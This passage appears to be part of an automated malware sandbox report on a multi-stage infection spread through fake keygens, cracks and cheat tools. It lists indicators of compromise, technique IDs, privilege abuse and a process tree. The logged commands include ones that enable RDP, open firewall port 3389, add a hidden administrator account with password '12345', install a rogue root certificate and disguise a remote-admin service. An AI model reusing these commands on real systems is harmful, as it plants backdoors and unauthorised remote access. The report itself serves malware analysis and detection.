f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	14.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	jg2_2qua.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec1314010461140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd19000000010000001000000018e847daffeaedafa0faaea36340ea792000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	intro.exe

NTFS ADS 3 IoCs

Processes:

update.exeutorrent.exetaskhost.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Desktop\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\Desktop\WinMgmts:\	utorrent.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1648 regedit.exe
1568 regedit.exe
Runs net.exe
Runs ping.exe 1 TTPs 11 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

3008 PING.EXE
2128 PING.EXE
2296 PING.EXE
2672 PING.EXE
3816 PING.EXE
2164 PING.EXE
3668 PING.EXE
5064 PING.EXE
4320 PING.EXE
2548 PING.EXE
4052 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

api.exe

pid process

2308 api.exe

pid	process
1648	regedit.exe
1568	regedit.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 30 IoCs

Processes:

2.exe3.exe4.exe5.exe6.exe7.exe8.exe9.exe10.exe11.exe12.exe13.exe14.exe15.exe16.exe17.exe18.exe19.exe20.exe21.exe22.exe23.exe24.exe25.exe26.exe27.exe28.exe29.exe30.exe31.exe

pid	process
1076	2.exe
2632	3.exe
2744	4.exe
2588	5.exe
1776	6.exe
1900	7.exe
2352	8.exe
2180	9.exe
2076	10.exe
1844	11.exe
2124	12.exe
1604	13.exe
2648	14.exe
1944	15.exe
816	16.exe
2012	17.exe
3068	18.exe
3008	19.exe
3136	20.exe
3384	21.exe
3552	22.exe
3744	23.exe
3832	24.exe
3868	25.exe
3956	26.exe
4016	27.exe
4084	28.exe
2548	29.exe
948	30.exe
3324	31.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exeLtHv0O2KZDK4M637.exekey.exe2.exe2.exe

pid	process
1748	update.exe
1748	update.exe
1748	update.exe
1748	update.exe
1748	update.exe
1516	rutserv.exe
1516	rutserv.exe
1516	rutserv.exe
1516	rutserv.exe
1600	rutserv.exe
1600	rutserv.exe
2180	rutserv.exe
2180	rutserv.exe
2280	rutserv.exe
2280	rutserv.exe
2280	rutserv.exe
2280	rutserv.exe
2280	rutserv.exe
2280	rutserv.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1632	winit.exe
1732	LtHv0O2KZDK4M637.exe
1732	LtHv0O2KZDK4M637.exe
1732	LtHv0O2KZDK4M637.exe
1732	LtHv0O2KZDK4M637.exe
1732	LtHv0O2KZDK4M637.exe
1236	key.exe
1236	key.exe
1076	2.exe
2148	2.exe
2148	2.exe

Suspicious behavior: GetForegroundWindowSpam 11 IoCs

Processes:

5.exeExplorer.EXEtaskhostw.exeapi.exeWerFault.exeWerFault.exemsiexec.exevbc.exemsiexec.exekeygen-step-4.exetaskhost.exe

pid	process
2588	5.exe
1268	Explorer.EXE
4072	taskhostw.exe
2308	api.exe
1720	WerFault.exe
4828	WerFault.exe
3188	msiexec.exe
4800	vbc.exe
2852	msiexec.exe
2804	keygen-step-4.exe
3516	taskhost.exe

Suspicious behavior: LoadsDriver 34 IoCs

Processes:

svchost.exe

pid	process
468
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe
3608	svchost.exe

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

2.exe2.execmmon32.exe18.exemstsc.exe3.exe13.exeIconCachenb6h.exeIconCachenb6h.exeStyltendeschris.exe19.exe11.exehmwmcj.exeIconCachenb6h.exeIconCachenb6h.execmmon32.exehelpqrqlwhj.exeIconCachenb6h.exeIconCachenb6h.exe23.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exeIconCachenb6h.exe

pid	process
1076	2.exe
2148	2.exe
2148	2.exe
2148	2.exe
2428	cmmon32.exe
2428	cmmon32.exe
3068	18.exe
3068	18.exe
3068	18.exe
3636	mstsc.exe
3636	mstsc.exe
2632	3.exe
1604	13.exe
3844	IconCachenb6h.exe
1548	IconCachenb6h.exe
1548	IconCachenb6h.exe
1548	IconCachenb6h.exe
1908	Styltendeschris.exe
3008	19.exe
2828	11.exe
2828	11.exe
4356	hmwmcj.exe
2828	11.exe
2828	11.exe
2416	IconCachenb6h.exe
4356	hmwmcj.exe
1568	IconCachenb6h.exe
4356	hmwmcj.exe
1568	IconCachenb6h.exe
1568	IconCachenb6h.exe
4356	hmwmcj.exe
4560	cmmon32.exe
4560	cmmon32.exe
4356	hmwmcj.exe
3432	helpqrqlwhj.exe
4356	hmwmcj.exe
3432	helpqrqlwhj.exe
3432	helpqrqlwhj.exe
5052	IconCachenb6h.exe
4032	IconCachenb6h.exe
4032	IconCachenb6h.exe
4032	IconCachenb6h.exe
4032	IconCachenb6h.exe
3744	23.exe
4680	IconCachenb6h.exe
2412	IconCachenb6h.exe
2412	IconCachenb6h.exe
2412	IconCachenb6h.exe
2412	IconCachenb6h.exe
5020	IconCachenb6h.exe
3580	IconCachenb6h.exe
3580	IconCachenb6h.exe
3580	IconCachenb6h.exe
3580	IconCachenb6h.exe
3256	IconCachenb6h.exe
4424	IconCachenb6h.exe
2428	cmmon32.exe
4424	IconCachenb6h.exe
4424	IconCachenb6h.exe
2428	cmmon32.exe
2428	cmmon32.exe
2428	cmmon32.exe
2428	cmmon32.exe
2428	cmmon32.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

16.exe

pid process

816 16.exe
Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

InstallUtil.exe

pid process

3704 InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rutserv.exerutserv.exerutserv.exeapi.exe2.exeExplorer.EXE5.execmmon32.exe8.exe26.exeAUDIODG.EXE18.exevssvc.exemstsc.exekey.exe

description	pid	process
Token: SeDebugPrivilege	1516	rutserv.exe
Token: SeDebugPrivilege	2180	rutserv.exe
Token: SeTakeOwnershipPrivilege	2280	rutserv.exe
Token: SeTcbPrivilege	2280	rutserv.exe
Token: SeTcbPrivilege	2280	rutserv.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeDebugPrivilege	2308	api.exe
Token: SeDebugPrivilege	2308	api.exe
Token: SeDebugPrivilege	2308	api.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeDebugPrivilege	2148	2.exe
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeDebugPrivilege	2588	5.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeDebugPrivilege	2308	api.exe
Token: SeDebugPrivilege	2308	api.exe
Token: SeDebugPrivilege	2308	api.exe
Token: SeDebugPrivilege	2428	cmmon32.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeRestorePrivilege	2308	api.exe
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeRestorePrivilege	2308	api.exe
Token: SeTakeOwnershipPrivilege	2308	api.exe
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeShutdownPrivilege	1268	Explorer.EXE
Token: SeDebugPrivilege	2352	8.exe
Token: SeDebugPrivilege	3956	26.exe
Token: 33	2660	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2660	AUDIODG.EXE
Token: 33	2660	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2660	AUDIODG.EXE
Token: SeDebugPrivilege	3068	18.exe
Token: SeBackupPrivilege	2800	vssvc.exe
Token: SeRestorePrivilege	2800	vssvc.exe
Token: SeAuditPrivilege	2800	vssvc.exe
Token: SeDebugPrivilege	3636	mstsc.exe
Token: SeImpersonatePrivilege	1236	key.exe
Token: SeTcbPrivilege	1236	key.exe
Token: SeChangeNotifyPrivilege	1236	key.exe
Token: SeCreateTokenPrivilege	1236	key.exe
Token: SeBackupPrivilege	1236	key.exe
Token: SeRestorePrivilege	1236	key.exe
Token: SeIncreaseQuotaPrivilege	1236	key.exe
Token: SeAssignPrimaryTokenPrivilege	1236	key.exe
Token: SeImpersonatePrivilege	1236	key.exe
Token: SeTcbPrivilege	1236	key.exe
Token: SeChangeNotifyPrivilege	1236	key.exe
Token: SeCreateTokenPrivilege	1236	key.exe

Suspicious use of FindShellTrayWindow 53 IoCs

Processes:

Downloads.exe30.exeExplorer.EXEmsiexec.exeapi.exeupdate.exeiexplore.exeiexplore.exemsiexec.exe

pid	process
2024	Downloads.exe
948	30.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
1268	Explorer.EXE
1268	Explorer.EXE
3188	msiexec.exe
1268	Explorer.EXE
1268	Explorer.EXE
2308	api.exe
1268	Explorer.EXE
1268	Explorer.EXE
2308	api.exe
4948	update.exe
4948	update.exe
4948	update.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1208	iexplore.exe
1268	Explorer.EXE
1268	Explorer.EXE
4716	iexplore.exe
2852	msiexec.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1208	iexplore.exe
2308	api.exe
2308	api.exe
1208	iexplore.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

30.exeExplorer.EXEapi.exeupdate.exe

pid	process
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
948	30.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
2308	api.exe
2308	api.exe
4948	update.exe
4948	update.exe
4948	update.exe
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
1268	Explorer.EXE
2308	api.exe
2308	api.exe

Suspicious use of SetWindowsHookEx 51 IoCs

Processes:

Downloads.exerutserv.exe002.exerutserv.exerutserv.exerutserv.exe002.exeapi.exe3.exe5.exe7.exe15.exe13.exe20.exe23.exe25.exe19.exerundll32.exe28.exe31.exekeygen-step-2.exeiexplore.exe002.exeStyltendeschris.exeid6.exeIEXPLORE.EXEwyfdggaa.exeiexplore.exeIEXPLORE.EXE24.exeInstallUtil.exeIEXPLORE.EXEIEXPLORE.EXE

pid	process
2024	Downloads.exe
2024	Downloads.exe
1516	rutserv.exe
1940	002.exe
1940	002.exe
1600	rutserv.exe
2180	rutserv.exe
2280	rutserv.exe
3060	002.exe
3060	002.exe
2308	api.exe
2632	3.exe
2588	5.exe
1900	7.exe
1944	15.exe
1604	13.exe
3136	20.exe
3744	23.exe
3868	25.exe
3008	19.exe
3132	rundll32.exe
4084	28.exe
3324	31.exe
2016	keygen-step-2.exe
1208	iexplore.exe
1208	iexplore.exe
4224	002.exe
4224	002.exe
1908	Styltendeschris.exe
1160	id6.exe
1160	id6.exe
4436	IEXPLORE.EXE
4436	IEXPLORE.EXE
3376	wyfdggaa.exe
3376	wyfdggaa.exe
3376	wyfdggaa.exe
3376	wyfdggaa.exe
4716	iexplore.exe
4716	iexplore.exe
2568	IEXPLORE.EXE
2568	IEXPLORE.EXE
1552	24.exe
3704	InstallUtil.exe
1208	iexplore.exe
1208	iexplore.exe
6060	IEXPLORE.EXE
6060	IEXPLORE.EXE
1208	iexplore.exe
1208	iexplore.exe
2164	IEXPLORE.EXE
2164	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

update.exewini.exeWScript.execmd.exeRemouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.execmd.exekeygen-pr.exe

description	pid	process	target process
PID 1748 wrote to memory of 876	1748	update.exe	wini.exe
PID 1748 wrote to memory of 876	1748	update.exe	wini.exe
PID 1748 wrote to memory of 876	1748	update.exe	wini.exe
PID 1748 wrote to memory of 876	1748	update.exe	wini.exe
PID 876 wrote to memory of 408	876	wini.exe	WScript.exe
PID 876 wrote to memory of 408	876	wini.exe	WScript.exe
PID 876 wrote to memory of 408	876	wini.exe	WScript.exe
PID 876 wrote to memory of 408	876	wini.exe	WScript.exe
PID 876 wrote to memory of 1632	876	wini.exe	winit.exe
PID 876 wrote to memory of 1632	876	wini.exe	winit.exe
PID 876 wrote to memory of 1632	876	wini.exe	winit.exe
PID 876 wrote to memory of 1632	876	wini.exe	winit.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 408 wrote to memory of 440	408	WScript.exe	cmd.exe
PID 440 wrote to memory of 1648	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1648	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1648	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1648	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1568	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1568	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1568	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1568	440	cmd.exe	regedit.exe
PID 440 wrote to memory of 1016	440	cmd.exe	timeout.exe
PID 440 wrote to memory of 1016	440	cmd.exe	timeout.exe
PID 440 wrote to memory of 1016	440	cmd.exe	timeout.exe
PID 440 wrote to memory of 1016	440	cmd.exe	timeout.exe
PID 1248 wrote to memory of 240	1248	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	cmd.exe
PID 1248 wrote to memory of 240	1248	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	cmd.exe
PID 1248 wrote to memory of 240	1248	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	cmd.exe
PID 1248 wrote to memory of 240	1248	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	cmd.exe
PID 240 wrote to memory of 996	240	cmd.exe	intro.exe
PID 240 wrote to memory of 996	240	cmd.exe	intro.exe
PID 240 wrote to memory of 996	240	cmd.exe	intro.exe
PID 240 wrote to memory of 996	240	cmd.exe	intro.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1320	240	cmd.exe	keygen-pr.exe
PID 240 wrote to memory of 1604	240	cmd.exe	keygen-step-1.exe
PID 240 wrote to memory of 1604	240	cmd.exe	keygen-step-1.exe
PID 240 wrote to memory of 1604	240	cmd.exe	keygen-step-1.exe
PID 240 wrote to memory of 1604	240	cmd.exe	keygen-step-1.exe
PID 1748 wrote to memory of 1764	1748	update.exe	cheat.exe
PID 1748 wrote to memory of 1764	1748	update.exe	cheat.exe
PID 1748 wrote to memory of 1764	1748	update.exe	cheat.exe
PID 1748 wrote to memory of 1764	1748	update.exe	cheat.exe
PID 240 wrote to memory of 316	240	cmd.exe	keygen-step-4.exe
PID 240 wrote to memory of 316	240	cmd.exe	keygen-step-4.exe
PID 240 wrote to memory of 316	240	cmd.exe	keygen-step-4.exe
PID 240 wrote to memory of 316	240	cmd.exe	keygen-step-4.exe
PID 440 wrote to memory of 1516	440	cmd.exe	rutserv.exe
PID 440 wrote to memory of 1516	440	cmd.exe	rutserv.exe
PID 440 wrote to memory of 1516	440	cmd.exe	rutserv.exe
PID 440 wrote to memory of 1516	440	cmd.exe	rutserv.exe
PID 1320 wrote to memory of 1236	1320	keygen-pr.exe	key.exe
PID 1320 wrote to memory of 1236	1320	keygen-pr.exe	key.exe

Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

3248 attrib.exe
3640 attrib.exe
2576 attrib.exe
2892 attrib.exe
476 attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1268

C:\Users\Admin\AppData\Local\Temp\Downloads.exe
"C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2024

C:\Users\Admin\Desktop\update.exe
"C:\Users\Admin\Desktop\update.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1748

C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:408

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Windows\install.bat" "
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:440

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
6⤵
- Runs .reg file with regedit
PID:1648

C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
6⤵
- Runs .reg file with regedit
PID:1568

C:\Windows\SysWOW64\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:1016

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1516

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1600

C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2180

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
6⤵
- Views/modifies file attributes
PID:2892

C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
6⤵
- Views/modifies file attributes
PID:476

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
6⤵
PID:2352

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
6⤵
PID:2660

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
6⤵
PID:2696

C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1632

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Programdata\Install\del.bat
5⤵
PID:2052

C:\Windows\SysWOW64\timeout.exe
timeout 5
6⤵
- Delays execution with timeout.exe
PID:2928

C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1764

C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
4⤵
- Executes dropped EXE
- NTFS ADS
PID:1760

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
5⤵
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:4072

C:\ProgramData\Microsoft\Intel\R8.exe
C:\ProgramData\Microsoft\Intel\R8.exe
5⤵
PID:2472

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
6⤵
PID:3712

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\pause.bat" "
7⤵
PID:4176

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
8⤵
- Kills process with taskkill
PID:2940

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
8⤵
- Kills process with taskkill
PID:4792

C:\Windows\SysWOW64\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:3584

C:\Windows\SysWOW64\chcp.com
chcp 1251
8⤵
PID:4900

C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
8⤵
PID:3548

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
8⤵
- Kills process with taskkill
PID:1224

C:\Windows\SysWOW64\timeout.exe
timeout 2
8⤵
- Delays execution with timeout.exe
PID:2860

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
8⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\bat.bat" "
9⤵
PID:3696

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
10⤵
PID:2320

C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
10⤵
PID:3892

C:\Windows\SysWOW64\netsh.exe
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
10⤵
PID:5376

C:\Windows\SysWOW64\net.exe
net.exe user "john" "12345" /add
10⤵
PID:5912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "john" "12345" /add
11⤵
PID:5996

C:\Windows\SysWOW64\chcp.com
chcp 1251
10⤵
PID:4652

C:\Windows\SysWOW64\net.exe
net localgroup "Администраторы" "John" /add
